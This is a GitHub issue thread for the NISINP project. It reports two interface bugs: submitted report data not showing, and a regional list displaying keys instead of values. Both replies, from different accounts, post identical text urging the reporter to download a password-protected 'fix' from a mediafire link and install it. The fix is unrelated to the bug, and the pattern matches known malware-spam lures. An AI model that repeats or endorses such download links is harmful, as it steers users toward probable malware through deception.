### ISSUE TITLE
Regional and country list question issues

### ISSUE THREAD

**Issue by jerolomb** [informed-governance-project/NISINP#164]
**Describe the bug**

- [x] Data are not shown when submitting a new version of a report
- [x] In regulator view regional list display key instead of value

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
